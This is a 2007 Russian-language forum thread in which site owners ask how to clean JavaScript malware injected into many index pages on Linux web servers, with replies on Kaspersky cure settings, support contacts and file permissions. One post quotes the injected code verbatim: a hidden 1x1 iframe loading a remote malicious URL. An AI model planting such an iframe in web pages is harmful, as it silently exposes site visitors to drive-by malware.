Не лечятся файлы с вирусом на Linux сервере

[mixey 0]

Как можно вылечить зараженные файлы на сервере (не предлагать ручное удаление вируса)?

Вирус: DoS.JS.Dframe.a

Операционная система на сервере: Fedora Core

Антивирус касперского находит файлы, но лечить отказывается.

 

Заражены файлы index.php (htm, html и пр расширения).

Может существуют какие-либо утилиты для удаления вредоносного кода?

[radioelectron 91]

Есть Антивирус Касперского для Linux File Server - http://www.kaspersky.ru/anti-virus_linux_file_server

Загрузить пробную версию можно отсюда - http://www.kaspersky.ru/anti-virus_fileservers_trial

 

Кстати, компания Untangle совсем недавно назвала Касперского лучшим Linux-антивирусом

 

ЗЫ Внушительный список антивирусов для Линукса (как платных, так и бесплатных) Вы можете посмотреть здесь - http://www.nixp.ru/soft/security_antivir

Изменено 14 августа, 2007 пользователем radioelectron

[mixey 0]

Linux File Server и установил. Вирус находит, но не лечит, только удаляет.

Хотя нужно чтобы удалил только JSвирусный код.

Вручную удалить вирусный код очень тяжело (index файлов около 1500)

[radioelectron 91]

Проверьте настройки антивируса - должен быть включен режим лечения (секция [scanner.options], параметр Cure=yes).

 

Также можно управлять приложением с помощью Kaspersky Administration Kit:

 

 

Вкладка "Параметры", пункт "Лечить зараженные объекты".

Изменено 13 августа, 2007 пользователем radioelectron

[mixey 0]

Все установил, режим лечения включен, но файлы не лечатся

[radioelectron 91]

Значит, остается только два варианта.

 

Если у Вас лицензия - можете зайти на страницу регистрации для клиентов Лаборатории Касперского. И из персонального кабинета написать в техподдержку конкретно по Вашему продукту.

 

И второй способ - попробовать что-нибудь из этого списка

Изменено 14 августа, 2007 пользователем radioelectron

[Современник 0]

У меня тоже с этим большая проблема. Сервер Linux, сайт http://kommersant.org.ua

 

Началось всё месяца два назад, когда Google заблокировал мой сайт, ссылаясь на вредоносное ПО а при открытии сайта -

АВК дико пищал, что найден вирус - Trojan-Downloader.JS.Psyme.jm - и блокировал сам сайт.

 

Тогда пересмотрел код главной страницы и нашел там такую запись:

<iframe src='http://ltds.biz/go.php?id=3240&user_name=gh0st' width='1' height='1' style='visibility: hidden;'></iframe>"

 

Удалил. Через три дня код опять появился на сайте. Я удалил - через неделю то же самое.

 

И так до сих пор. Хорошо, что index страниц там всего три - можно и ручками удалить. Может что посоветуете?

 

 

 

P.S. В вирусах я мало что пониманию. А антивирусом ЛК пользуюсь уже лет пять наверное. Лицензия - персональная.

Изменено 30 августа, 2007 пользователем Современник

[AZЪ 261]

Пароль на доступ к контенту сайта попробуйте поменять.

[radioelectron 91]

Может что посоветуете?

Ни в коем случае нельзя ставить права доступа к файлам 777. У Вас наверняка стоит разрешение на запись, и любой прохожий кулхацкер может запросто перезаписать любой файл вредоносным.

 

Если Вы не понимаете, о чем я говорю - смотрите сюда - http://omsk777.ru/all.php?act=dostup